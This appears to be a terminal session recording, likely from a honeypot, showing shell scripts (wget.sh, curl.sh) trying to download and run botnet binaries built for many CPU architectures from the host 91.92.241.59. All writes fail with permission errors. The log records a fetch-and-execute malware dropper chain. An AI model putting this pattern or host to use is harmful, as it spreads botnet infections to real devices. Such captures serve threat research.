[12.496516, "o", "wget.sh: 15: ./odin.m68k: not found\r\n"]
[12.499948, "o", "--2025-10-27 06:32:25--  http://91.92.241.59/odin.mips\r\nConnecting to 91.92.241.59:80... "]
[12.541252, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[12.583114, "o", "200 OK\r\nLength: 169356 (165K) [application/octet-stream]\r\nodin.mips: Permission denied\r\n"]
[12.5832, "o", "\r\nCannot write to ‘odin.mips’ (No such file or directory).\r\n"]
[12.584609, "o", "chmod: cannot access 'odin.mips': No such file or directory\r\n"]
[12.58486, "o", "wget.sh: 16: ./odin.mips: not found\r\n"]
[12.587076, "o", "--2025-10-27 06:32:25--  http://91.92.241.59/odin.mpsl\r\nConnecting to 91.92.241.59:80... "]
[12.736988, "o", "connected.\r\n"]
[12.737217, "o", "HTTP request sent, awaiting response... "]
[13.163377, "o", "200 OK\r\nLength: 169388 (165K) [application/octet-stream]\r\nodin.mpsl: Permission denied\r\n\r\nCannot write to ‘odin.mpsl’ (No such file or directory).\r\n"]
[13.165196, "o", "chmod: cannot access 'odin.mpsl': No such file or directory\r\n"]
[13.165498, "o", "wget.sh: 17: ./odin.mpsl: not found\r\n"]
[13.168951, "o", "--2025-10-27 06:32:26--  http://91.92.241.59/odin.ppc\r\nConnecting to 91.92.241.59:80... "]
[13.265465, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[13.306916, "o", "200 OK\r\nLength: 129716 (127K) [application/octet-stream]\r\n"]
[13.307191, "o", "odin.ppc: Permission denied\r\n"]
[13.307267, "o", "\r\nCannot write to ‘odin.ppc’ (No such file or directory).\r\n"]
[13.309008, "o", "chmod: cannot access 'odin.ppc': No such file or directory\r\n"]
[13.309243, "o", "wget.sh: 18: ./odin.ppc: not found\r\n"]
[13.312888, "o", "--2025-10-27 06:32:26--  http://91.92.241.59/odin.sh4\r\nConnecting to 91.92.241.59:80... "]
[13.354108, "o", "connected.\r\n"]
[13.354318, "o", "HTTP request sent, awaiting response... "]
[13.39612, "o", "200 OK\r\nLength: 113248 (111K) [application/octet-stream]\r\nodin.sh4: Permission denied\r\n"]
[13.396378, "o", "\r\nCannot write to ‘odin.sh4’ (No such file or directory).\r\n"]
[13.39825, "o", "chmod: cannot access 'odin.sh4': No such file or directory\r\n"]
[13.398615, "o", "wget.sh: 19: ./odin.sh4: not found\r\n"]
[13.4023, "o", "--2025-10-27 06:32:26--  http://91.92.241.59/odin.spc\r\nConnecting to 91.92.241.59:80... "]
[13.443548, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[13.485181, "o", "200 OK\r\nLength: 53988 (53K) [application/x-pkcs7-certificates]\r\nodin.spc: Permission denied\r\n"]
[13.485263, "o", "\r\nCannot write to ‘odin.spc’ (No such file or directory).\r\n"]
[13.487771, "o", "chmod: cannot access 'odin.spc': No such file or directory\r\nwget.sh: 20: ./odin.spc: not found\r\n"]
[13.491808, "o", "--2025-10-27 06:32:26--  http://91.92.241.59/odin.x64\r\nConnecting to 91.92.241.59:80... "]
[13.533262, "o", "connected.\r\n"]
[13.533343, "o", "HTTP request sent, awaiting response... "]
[13.574898, "o", "200 OK\r\nLength: 139160 (136K) [application/octet-stream]\r\nodin.x64: Permission denied\r\n\r\nCannot write to ‘odin.x64’ (No such file or directory).\r\n"]
[13.576957, "o", "chmod: cannot access 'odin.x64': No such file or directory\r\n"]
[13.577139, "o", "wget.sh: 21: ./odin.x64: not found\r\n"]
[13.580688, "o", "--2025-10-27 06:32:26--  http://91.92.241.59/odin.x86\r\nConnecting to 91.92.241.59:80... "]
[13.622065, "o", "connected.\r\n"]
[13.622132, "o", "HTTP request sent, awaiting response... "]
[13.740308, "o", "200 OK\r\nLength: 84104 (82K) [application/octet-stream]\r\nodin.x86: Permission denied\r\n"]
[13.740379, "o", "\r\n"]
[13.740415, "o", "Cannot write to ‘odin.x86’ (No such file or directory).\r\n"]
[13.742247, "o", "chmod: cannot access 'odin.x86': No such file or directory\r\n"]
[13.742636, "o", "wget.sh: 22: ./odin.x86: not found\r\n"]
[13.74592, "o", "--2025-10-27 06:32:26--  http://91.92.241.59/bizy.arm5\r\n"]
[13.746067, "o", "Connecting to 91.92.241.59:80... "]
[13.787203, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[13.924132, "o", "200 OK\r\nLength: 1639216 (1.6M) [application/octet-stream]\r\nbizy.arm5: Permission denied\r\n"]
[13.924222, "o", "\r\nCannot write to ‘bizy.arm5’ (No such file or directory).\r\n"]
[13.925953, "o", "chmod: cannot access 'bizy.arm5': No such file or directory\r\n"]
[13.926268, "o", "wget.sh: 24: ./bizy.arm5: not found\r\n"]
[13.931399, "o", "--2025-10-27 06:32:26--  http://91.92.241.59/bizy.arm6\r\nConnecting to 91.92.241.59:80... "]
[13.972759, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[14.015112, "o", "200 OK\r\nLength: 1632424 (1.6M) [application/octet-stream]\r\nbizy.arm6: Permission denied\r\n"]
[14.0152, "o", "\r\nCannot write to ‘bizy.arm6’ (No such file or directory).\r\n"]
[14.017262, "o", "chmod: cannot access 'bizy.arm6': No such file or directory\r\n"]
[14.01765, "o", "wget.sh: 25: ./bizy.arm6: not found\r\n"]
[14.022094, "o", "--2025-10-27 06:32:27--  http://91.92.241.59/bizy.arm7\r\nConnecting to 91.92.241.59:80... "]
[14.063316, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[14.106921, "o", "200 OK\r\nLength: 1626952 (1.6M) [application/octet-stream]\r\nbizy.arm7: Permission denied\r\n"]
[14.107098, "o", "\r\nCannot write to ‘bizy.arm7’ (No such file or directory).\r\n"]
[14.108553, "o", "chmod: cannot access 'bizy.arm7': No such file or directory\r\n"]
[14.108866, "o", "wget.sh: 26: ./bizy.arm7: not found\r\n"]
[14.113251, "o", "--2025-10-27 06:32:27--  http://91.92.241.59/bizy.arm8\r\nConnecting to 91.92.241.59:80... "]
[14.154346, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[14.195903, "o", "200 OK\r\nLength: 1536596 (1.5M) [application/octet-stream]\r\n"]
[14.196195, "o", "bizy.arm8: Permission denied\r\n\r\nCannot write to ‘bizy.arm8’ (No such file or directory).\r\n"]
[14.197599, "o", "chmod: cannot access 'bizy.arm8': No such file or directory\r\n"]
[14.197787, "o", "wget.sh: 27: ./bizy.arm8: not found\r\n"]
[14.202077, "o", "--2025-10-27 06:32:27--  http://91.92.241.59/bizy.mips\r\nConnecting to 91.92.241.59:80... "]
[14.243221, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[14.284743, "o", "200 OK\r\nLength: 1625968 (1.5M) [application/octet-stream]\r\nbizy.mips: Permission denied\r\n"]
[14.284798, "o", "\r\nCannot write to ‘bizy.mips’ (No such file or directory).\r\n"]
[14.286415, "o", "chmod: cannot access 'bizy.mips': No such file or directory\r\n"]
[14.286664, "o", "wget.sh: 28: ./bizy.mips: not found\r\n"]
[14.291105, "o", "--2025-10-27 06:32:27--  http://91.92.241.59/bizy.mpsl\r\nConnecting to 91.92.241.59:80... "]
[14.332139, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[14.374905, "o", "200 OK\r\nLength: 1618340 (1.5M) [application/octet-stream]\r\nbizy.mpsl: Permission denied\r\n"]
[14.374945, "o", "\r\nCannot write to ‘bizy.mpsl’ (No such file or directory).\r\n"]
[14.375805, "o", "chmod: cannot access 'bizy.mpsl': No such file or directory\r\n"]
[14.375995, "o", "wget.sh: 29: ./bizy.mpsl: not found\r\n"]
[14.378415, "o", "--2025-10-27 06:32:27--  http://91.92.241.59/bizy.mipss\r\nConnecting to 91.92.241.59:80... "]
[14.419633, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[14.461133, "o", "200 OK\r\nLength: 1631496 (1.6M) [application/octet-stream]\r\nbizy.mipss: Permission denied\r\n\r\nCannot write to ‘bizy.mipss’ (No such file or directory).\r\n"]
[14.46228, "o", "chmod: cannot access './bizy.mipss': No such file or directory\r\n"]
[14.462519, "o", "wget.sh: 30: ./bizy.mipss: not found\r\n"]
[14.46523, "o", "--2025-10-27 06:32:27--  http://91.92.241.59/bizy.mpsls\r\nConnecting to 91.92.241.59:80... "]
[14.506425, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[14.547912, "o", "200 OK\r\nLength: 1623604 (1.5M) [application/octet-stream]\r\nbizy.mpsls: Permission denied\r\n"]
[14.548104, "o", "\r\nCannot write to ‘bizy.mpsls’ (No such file or directory).\r\n"]
[14.549466, "o", "chmod: cannot access './bizy.mpsls': No such file or directory\r\n"]
[14.549718, "o", "wget.sh: 31: ./bizy.mpsls: not found\r\n"]
[14.554267, "o", "--2025-10-27 06:32:27--  http://91.92.241.59/bizy.riscv\r\nConnecting to 91.92.241.59:80... "]
[14.595465, "o", "connected.\r\n"]
[14.595522, "o", "HTTP request sent, awaiting response... "]
[14.637205, "o", "200 OK\r\nLength: 3932344 (3.8M) [application/octet-stream]\r\nbizy.riscv: Permission denied\r\n"]
[14.637387, "o", "\r\nCannot write to ‘bizy.riscv’ (No such file or directory).\r\n"]
[14.638758, "o", "chmod: cannot access 'bizy.riscv': No such file or directory\r\n"]
[14.639032, "o", "wget.sh: 32: ./bizy.riscv: not found\r\n"]
[14.643362, "o", "--2025-10-27 06:32:27--  http://91.92.241.59/bizy.x86\r\nConnecting to 91.92.241.59:80... "]
[14.783796, "o", "connected.\r\n"]
[14.78388, "o", "HTTP request sent, awaiting response... "]
[14.82615, "o", "200 OK\r\nLength: 1645884 (1.6M) [application/octet-stream]\r\nbizy.x86: Permission denied\r\n"]
[14.826228, "o", "\r\nCannot write to ‘bizy.x86’ (No such file or directory).\r\n"]
[14.828133, "o", "chmod: cannot access 'bizy.x86': No such file or directory\r\n"]
[14.828311, "o", "wget.sh: 33: ./bizy.x86: not found\r\n"]
[14.832915, "o", "--2025-10-27 06:32:27--  http://91.92.241.59/bizy.x64\r\nConnecting to 91.92.241.59:80... "]
[14.874407, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[14.953259, "o", "200 OK\r\nLength: 1668100 (1.6M) [application/octet-stream]\r\nbizy.x64: Permission denied\r\n"]
[14.953321, "o", "\r\nCannot write to ‘bizy.x64’ (No such file or directory).\r\n"]
[14.954974, "o", "chmod: cannot access 'bizy.x64': No such file or directory\r\n"]
[14.95534, "o", "wget.sh: 34: ./bizy.x64: not found\r\n"]
[14.965692, "o", "  % Total    % Received % Xferd  A"]
[14.965923, "o", "verage Speed   Time    Time     Time  Current\r\n                          "]
[14.96597, "o", "       Dload  Upload   Total   Spent    Le"]
[14.966002, "o", "ft  Speed\r\n"]
[14.966058, "o", "\r  0     0    0     0"]
[14.966231, "o", "    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[15.048489, "o", "\r100  2795  100  2795    0     0  33718      0 --:--:-- --:--:-- --:--:-- 34085\r\n"]
[15.05128, "o", "curl.sh: 3: ulimit: error setting limit (Operation not permitted)\r\ncurl.sh: 5: cannot create .x: Permission denied\r\n"]
[15.051422, "o", "curl.sh: 5: cannot create .x: Permission denied\r\n"]
[15.051462, "o", "curl.sh: 5: cannot create .x: Permission denied\r\ncurl.sh: 5: cd: can't cd to /root\r\ncurl.sh: 5: cannot create .x: Permission denied\r\ncurl.sh: 5: cannot create .x: Permission denied\r\n"]
[15.063508, "o", "  % Total    % Received % Xferd  Average Speed   T"]
[15.06357, "o", "ime    Time     Time  Cur"]
[15.063762, "o", "rent\r\n                                 Dload  Upload   To"]
[15.063803, "o", "tal   Spent    Left  Speed\r\n\r  0     0    0     0"]
[15.064055, "o", "    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[15.225257, "o", "Warning: Failed to create the file odin.arm: Permission denied\r\n\r  3  126k    3  3908    0     0  24141      0  0:00:05 --:--:--  0:00:05 24273\r\n"]
[15.225415, "o", "curl: (23) Failure writing output to destination\r\n"]
[15.227341, "o", "chmod: cannot access 'odin.arm': No such file or directory\r\n"]
[15.227612, "o", "curl.sh: 10: ./odin.arm: not found\r\n"]
[15.233542, "o", "  % Total    % Received % Xferd  Average Spe"]
[15.233564, "o", "ed   Time    "]
[15.233644, "o", "Time     Time  Current\r\n                                 Dload"]
[15.233657, "o", "  Upload   Total"]
[15.233669, "o", "   Spent  "]
[15.233686, "o", "  Left  Speed\r\n"]
[15.233713, "o", "\r  0     0    0     0    "]
[15.23387, "o", "0     0      0      0 --:--:-- "]
[15.233911, "o", "--:--:-- --:--:--     0"]
[15.31617, "o", "Warning: Failed to create the file odin.arm5: Permission denied\r\n\r  3  122k    3  3908    0     0  47315      0  0:00:02 --:--:--  0:00:02 47658\r\n"]
[15.316245, "o", "curl: (23) Failure writing output to destination\r\n"]
[15.318309, "o", "chmod: cannot access 'odin.arm5': No such file or directory\r\n"]
[15.318456, "o", "curl.sh: 11: ./odin.arm5: not found\r\n"]
[15.323402, "o", "  % Total    % Received % Xferd  Average Speed   Time    T"]
[15.323444, "o", "ime     Time  Current\r\n                                 Dload  Upload"]
[15.323457, "o", "   Total   Spent    Left  Speed"]
[15.323469, "o", "\r\n\r  0 "]
[15.323479, "o", "    0    "]
[15.323582, "o", "0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[15.523778, "o", "\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[15.552931, "o", "Warning: Failed to create the file odin.arm5n: Permission denied\r\n\r  5 44912    5  2589    0     0  11280      0  0:00:03 --:--:--  0:00:03 11256\r\ncurl: (23) Failur"]
[15.552988, "o", "e writing output to destination\r\n"]
[15.554842, "o", "chmod: cannot access 'odin.arm5n': No such file or directory\r\n"]
[15.55503, "o", "curl.sh: 12: ./odin.arm5n: not found\r\n"]
[15.560525, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     "]
[15.560571, "o", "Time  Current\r\n      "]
[15.560754, "o", "                           Dload  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[15.643619, "o", "Warning: Failed to create the file odin.arm6: Permission denied\r\n\r  2  137k    2  3908    0     0  46989      0  0:00:03 --:--:--  0:00:03 47084\r\n"]
[15.643679, "o", "curl: (23) Failure writing output t"]
[15.643701, "o", "o destination\r\n"]
[15.645443, "o", "chmod: cannot access 'odin.arm6': No such file or directory\r\n"]
[15.645677, "o", "curl.sh: 13: ./odin.arm6: not found\r\n"]
[15.650678, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\r\n                   "]
[15.650721, "o", "              Dload  Upload   To"]
[15.650888, "o", "tal   S"]
[15.650922, "o", "pent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[15.782639, "o", "Warning: Failed to create the file odin.arm7: Permission denied\r\n\r  2  171k    2  3908    0     0  29611      0  0:00:05 --:--:--  0:00:05 29832\r\n"]
[15.782722, "o", "curl: (23) Failure writing output to destination\r\n"]
[15.78493, "o", "chmod: cannot access 'odin.arm7': No such file or directory\r\n"]
[15.7852, "o", "curl.sh: 14: ./odin.arm7: not found\r\n"]
[15.793065, "o", "  % Total    % Received % Xfer"]
[15.79336, "o", "d  Average Speed   Time    Time "]
[15.793528, "o", "    Time  Current\r\n                                 Dload  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:-"]
[15.793725, "o", "-:--     0"]
[15.876599, "o", "Warning: Failed to create the file odin.m68k: Permission denied\r\n\r  6  141k    6  9460    0     0   110k      0  0:00:01 --:--:--  0:00:01  111k\r\n"]
[15.876699, "o", "curl: (23) Failure writing output to destination\r\n"]
[15.879455, "o", "chmod: cannot access 'odin.m68k': No such file or directory\r\n"]
[15.879855, "o", "curl.sh: 15: ./odin.m68k: not found\r\n"]
[15.888904, "o", "  % Total    % Received %"]
[15.889096, "o", " Xferd  A"]
[15.88914, "o", "verage Speed   Time    Time     Time  Current\r\n   "]
[15.889186, "o", "         "]
[15.889383, "o", "                     Dload  "]
[15.889485, "o", "Upload   Total"]
[15.889586, "o", "   Spent    Left  Speed\r\n"]
[15.88971, "o", "\r  0     0    0     0    0     0      0      0 "]
[15.889802, "o", "--:--"]
[15.88987, "o", ":-- --:--:-- --:--:--     0"]
[15.971924, "o", "Warning: Failed to create the file odin.mips: Permission denied\r\n\r  3  165k    3  6684    0     0  80345      0"]
[15.972018, "o", "  0:00:02 --:--:--  0:00:02 80530\r\n"]
[15.97244, "o", "curl: (23) Failure writing output to destination\r\n"]
[15.974766, "o", "chmod: cannot access 'odin.mips': No such file or directory\r\n"]
[15.975077, "o", "curl.sh: 16: ./odin.mips: not found\r\n"]
[15.983459, "o", "  % Total    % Received % Xferd "]
[15.983518, "o", " Average Speed   Time    Time     "]
[15.98354, "o", "Time  C"]
[15.983556, "o", "urrent\r\n            "]
[15.984133, "o", "                     Dload  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[16.066067, "o", "Warning: Failed to create the file odin.mpsl: Permission denied\r\n\r  2  165k    2  3908    0     0  47241      0  0:00:03 --:--:--  0:00:03 47658\r\n"]
[16.066111, "o", "curl: (23) Failure writing output to destinat"]
[16.066264, "o", "ion\r\n"]
[16.067842, "o", "chmod: cannot access 'odin.mpsl': No such file or directory\r\n"]
[16.067964, "o", "curl.sh: 17: ./odin.mpsl: not found\r\n"]
[16.072973, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     Time"]
[16.073011, "o", "  Current\r\n                                 Dloa"]
[16.073023, "o", "d  Upload   Total   Spe"]
[16.073031, "o", "nt    Le"]
[16.073038, "o", "ft  Speed"]
[16.073045, "o", "\r\n\r"]
[16.073063, "o", "  0     0    0   "]
[16.073076, "o", "  0   "]
[16.073219, "o", " 0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[16.155529, "o", "Warning: Failed to create the file odin.ppc: Permission denied\r\n\r  3  126k    3  3908    0     0  47314      0  0:00:02 --:--:--  0:00:02 47658\r\n"]
[16.155855, "o", "curl: (23) Failure writing output to destination\r\n"]
[16.15802, "o", "chmod: cannot access 'odin.ppc': No such file or directory\r\n"]
[16.15823, "o", "curl.sh: 18: ./odin.ppc: not found\r\n"]
[16.167133, "o", "  % Total    % Received % Xferd  Average Speed   Time    T"]
[16.167212, "o", "ime     Time  Current\r\n                                 D"]
[16.167231, "o", "load  Upload   Total   Spent "]
[16.167434, "o", "   Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:-"]
[16.167491, "o", "-:-- --:--:-- --:--:--     0"]
[16.269413, "o", "Warning: Failed to create the file odin.sh4: Permission denied\r\n\r  5  110k    5  6684    0     0  65305      0  0:00:01 --:--:--  0:00:01 65529\r\n"]
[16.269938, "o", "curl: (23) Failure writing output to destination\r\n"]
[16.272231, "o", "chmod: cannot access 'odin.sh4': No such file or directory\r\n"]
[16.27249, "o", "curl.sh: 19: ./odin.sh4: not found\r\n"]
[16.281134, "o", "  % Total    % Received % Xferd  Average Speed   Time "]
[16.281234, "o", "   Time     Time  Current\r\n "]
[16.281269, "o", "                                Dl"]
[16.281324, "o", "oad  Upload   Total   Spe"]
[16.281855, "o", "nt    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[16.370996, "o", "Warning: Failed to create the file odin.spc: Permission denied\r\n\r  7 53988    7  3901    0     0  43307      0  0:00:01 --:--:--  0:00:01 438"]
[16.371131, "o", "31\r\n"]
[16.37118, "o", "curl: (23) Failure writing output to"]
[16.371576, "o", " destination\r\n"]
[16.373556, "o", "chmod: cannot access 'odin.spc': No such file or directory\r\n"]
[16.373729, "o", "curl.sh: 20: ./odin.spc: not found\r\n"]
[16.381699, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     T"]
[16.381747, "o", "ime  Current\r\n                              "]
[16.381768, "o", "   Dload  Upload   Total"]
[16.381797, "o", "   S"]
[16.381884, "o", "pent    Left  Speed\r\n\r  0     0    0"]
[16.381901, "o", "     0   "]
[16.381976, "o", " 0     0      0      0 --:--"]
[16.381987, "o", ":-- --:--:--"]
[16.382237, "o", " --:--:--     0"]
[16.464393, "o", "Warning: Failed to create the file odin.x64: Permission denied\r\n\r  2  135k    2  3908    0     0  47314      0  0:00:02 --:--:--  0:00:02 47658\r\ncurl: (23) Failure writing output to destination\r\n"]
[16.466725, "o", "chmod: cannot access 'odin.x64': No such file or directory\r\n"]
[16.467139, "o", "curl.sh: 21: ./odin.x64: not found\r\n"]
[16.477644, "o", "  % Total    % Received % Xferd  Average Speed   Time    T"]
[16.477795, "o", "ime     Time  Current\r\n                                 Dload  Upload   Total   Spent    Left"]
[16.477965, "o", "  Speed\r\n\r  0     0    0     0    0     0      0 "]
[16.477993, "o", "     0 --:-"]
[16.478023, "o", "-:"]
[16.478044, "o", "-- "]
[16.478064, "o", "--"]
[16.478096, "o", ":-"]
[16.478124, "o", "-:-- --:"]
[16.478187, "o", "--:--    "]
[16.478226, "o", " 0\r  0   "]
[16.478257, "o", "  0    0     0  "]
[16.478513, "o", "  0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[16.560241, "o", "Warning: Failed to create the file odin.x86: Permission denied\r\n\r 11 84104   11  9461    0     0   111k      0 --:--:-- --:--:-- --:--:--  111k\r\ncurl: (23) Failure writing output to destination\r\n"]
[16.562534, "o", "chmod: cannot access 'odin.x86': No such file or directory\r\n"]
[16.562911, "o", "curl.sh: 22: ./odin.x86: not found\r\n"]
[16.57145, "o", "  % Total    % Received % Xferd  Ave"]
[16.571502, "o", "rage Speed   Time    Time     T"]
[16.57175, "o", "ime  Current\r\n                                 Dload  Upload"]
[16.571942, "o", "   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[16.654335, "o", "Warning: Failed to create the file bizy.arm5: Permission denied\r\n\r  0 1600k    0  6683    0     0  80443      0  0:00:20 --:--"]
[16.654408, "o", ":--  0:00:20 81500\r\n"]
[16.654748, "o", "curl: (23) Failure writi"]
[16.654837, "o", "ng output to destination\r\n"]
[16.65697, "o", "chmod: cannot access 'bizy.arm5': No such file or directory\r\n"]
[16.657259, "o", "curl.sh: 25: ./bizy.arm5: not found\r\n"]
[16.666898, "o", "  % Total    % Received % Xferd  Average Speed   Time    T"]
[16.667042, "o", "ime     Time  Current\r\n                                 Dload  Upload   Total   Spent    Left  Sp"]
[16.667084, "o", "eed\r\n\r  0  "]
[16.667111, "o", "   "]
[16.667133, "o", "0    0     0    0"]
[16.66715, "o", "     0 "]
[16.66731, "o", "     0      0 --:--:-- --:--:-- --"]
[16.667465, "o", ":--:--     0"]
[16.856559, "o", "Warning: Failed to create the file bizy.arm6: Permission denied\r\n\r  0 1594k    0 12235    0 "]
[16.856627, "o", "    0  64437      0  0:00:25 --:--:--  0:00:25"]
[16.856643, "o", " 64735\r\n"]
[16.856963, "o", "curl: (23) Failure writing output to destination\r\n"]
[16.859471, "o", "chmod: cannot access 'bizy.arm6': No such file or directory\r\n"]
[16.859758, "o", "curl.sh: 26: ./bizy.arm6: not found\r\n"]
[16.866807, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Cur"]
[16.867006, "o", "rent\r\n                                 Dload  Upload   Total   Spent    Left  Speed\r\n\r  0    "]
[16.867211, "o", " 0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[16.949583, "o", "Warning: Failed to create the file bizy.arm7: Permission denied\r\n\r  0 1588k    0  6683    0     0  80646      0  0:00:20 --:--:--  0:00:20 81500\r\n"]
[16.9498, "o", "curl: (23) Failure writing output to destination\r\n"]
[16.951945, "o", "chmod: cannot access 'bizy.arm7': No such file or directory\r\n"]
[16.952215, "o", "curl.sh: 27: ./bizy.arm7: not found\r\n"]
[16.961458, "o", "  % Total    % Received %"]
[16.961489, "o", " Xferd  Avera"]
[16.961689, "o", "ge Speed   Time    Time     Time  Current\r\n                                 Dload  Upload   Total   Sp"]
[16.961763, "o", "ent    Left  S"]
[16.96188, "o", "peed\r\n\r  0     0    0     0    0     0      0      0 --:"]
[16.961985, "o", "--:-- --:--:-- --:--:--     0"]
[17.207127, "o", "Warning: Failed to create the file bizy.arm8: Permission denied\r\n\r  0 1500k    0  6683    0     0  27187      0"]
[17.207267, "o", "  0:00:56 --:--:--  0:00:56 27277\r\n"]
[17.207376, "o", "curl: (23) Failure wr"]
[17.207404, "o", "iting output to destination\r\n"]
[17.210116, "o", "chmod: cannot access 'bizy.arm8': No such file or directory\r\n"]
[17.210286, "o", "curl.sh: 28: ./bizy.arm8: not found\r\n"]
[17.216558, "o", "  % Total    % Received % Xferd  Average Speed   T"]
[17.216582, "o", "ime    Time    "]
[17.216594, "o", " Time  Current\r\n                            "]
[17.216615, "o", "     Dl"]
[17.216629, "o", "oad  Upload"]
[17.216724, "o", "   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --"]
[17.216789, "o", ":--:-- --:--:-- --:--:--     0"]
[17.389002, "o", "Warning: Failed to create the file bizy.mips: Permission denied\r\n\r  0 1587k    0  6683    0     0  38748      0  0:00:41 --:--:--  0:00:41 38854\r\n"]
[17.389256, "o", "curl: (23) Failure writing output to dest"]
[17.389304, "o", "ination\r\n"]
[17.390879, "o", "chmod: cannot access 'bizy.mips': No such file or directory\r\n"]
[17.390985, "o", "curl.sh: 29: ./bizy.mips: not found\r\n"]
[17.396794, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     "]
[17.39684, "o", "Time  Current\r\n"]
[17.396853, "o", "                                 Dl"]
[17.396974, "o", "oad"]
[17.397074, "o", "  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --"]
[17.397203, "o", ":--:-- --:--:-- --:--:--     0"]
[17.479543, "o", "Warning: Failed to create the file bizy.mpsl: Permission denied\r\n\r  0 1580k    0  2587    0     0  31254      0  0:00:51 --:--:--  0:00:51 31168\r\n"]
[17.479614, "o", "curl: (23) Failure writing output to "]
[17.479636, "o", "destination\r\n"]
[17.481727, "o", "chmod: cannot access 'bizy.mpsl': No such file or directory\r\n"]
[17.481937, "o", "curl.sh: 30: ./bizy.mpsl: not found\r\n"]
[17.492073, "o", "  % Total    % Received % Xferd  Average Speed   Ti"]
[17.492224, "o", "me    Time     Time  Current\r\n                                 Dload  Upload   Total   Spent    Left "]
[17.492257, "o", " Speed\r\n\r  0     0 "]
[17.492281, "o", "   0     0    "]
[17.492304, "o", "0  "]
[17.492321, "o", "   0"]
[17.492562, "o", "      0      0 --:--:-- --:--:-- --:--:--     0"]
[17.575342, "o", "Warning: Failed to create the file bizy.mipss: Permission denied\r\n\r  0 1593k    0  6683    0     0  80145      0  0:00:20 --:--:--  0:00:20 80518\r\n"]
[17.575441, "o", "curl: (23) Failure writing output to destination\r\n"]
[17.578145, "o", "chmod: cannot access 'bizy.mipss': No such file or directory\r\n"]
[17.5786, "o", "curl.sh: 31: ./bizy.mipss: not found\r\n"]
[17.589099, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time    "]
[17.589452, "o", " Time  Current\r\n                                 Dload  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0   "]
[17.589499, "o", "   0      0 --:--:-- --:--:-- --:--:"]
[17.589699, "o", "--     0"]
[17.672199, "o", "Warning: Failed to create the file bizy.mpsls: Permission denied\r\n\r  0 1585k    0  6683    0     0  80325      0  0:00:20 --:--:--  0:00:20 81500\r\n"]
[17.672454, "o", "curl: (23) Failure writing output to destination\r\n"]
[17.674774, "o", "chmod: cannot access 'bizy.mpsls': No such file or directory\r\n"]
[17.675171, "o", "curl.sh: 32: ./bizy.mpsls: not found\r\n"]
[17.685188, "o", "  % Total    % Received % Xferd  Average Speed   Time "]
[17.685245, "o", "   Time     Time  C"]
[17.685263, "o", "urrent\r\n                  "]
[17.685525, "o", "               Dload  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --"]
[17.68558, "o", ":--:-- --:--:--     0"]
[17.768063, "o", "Warning: Failed to create the file bizy.riscv: Permission denied\r\n\r  0 3840k    0  1199    0     0  14432      0  0:04:32 --:--:--  "]
[17.768279, "o", "0:04:32 14621\r\n"]
[17.768314, "o", "curl: (23) Failure writing output to destination\r\n"]
[17.770308, "o", "chmod: cannot access 'bizy.riscv': No such file or directory\r\n"]
[17.770609, "o", "curl.sh: 33: ./bizy.riscv: not found\r\n"]
[17.77957, "o", "  % Total    % Received "]
[17.77961, "o", "% Xferd  Average Sp"]
[17.779895, "o", "eed   Time    Time     Time  Current\r\n                                 Dload  Upload   "]
[17.779928, "o", "Total   Spe"]
[17.779942, "o", "nt    Le"]
[17.779954, "o", "ft  S"]
[17.77997, "o", "pe"]
[17.779981, "o", "ed\r\n\r  "]
[17.780028, "o", "0     0    0  "]
[17.780054, "o", "   0    0     0      0      0 --:--:--"]
[17.780294, "o", " --:--:-- --:--:--     0"]
[17.923492, "o", "Warning: Failed to create the file bizy.x86: Permission denied\r\n\r  0 1607k    0  1199    0     0   8330      0  0:03:17 --:--:--  0:03:17  8384\r\n"]
[17.923549, "o", "curl: (23) Failure writing output to destination\r\n"]
[17.926433, "o", "chmod: cannot access 'bizy.x86': No such file or directory\r\n"]
[17.926683, "o", "curl.sh: 34: ./bizy.x86: not found\r\n"]
[17.936765, "o", "  % Total    % Received % Xferd  Average Spee"]
[17.936873, "o", "d   Time    Time     Time  Current\r\n"]
[17.936933, "o", "                                "]
[17.936959, "o", " Dload  Upload"]
[17.93699, "o", "   Total "]
[17.937299, "o", "  Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
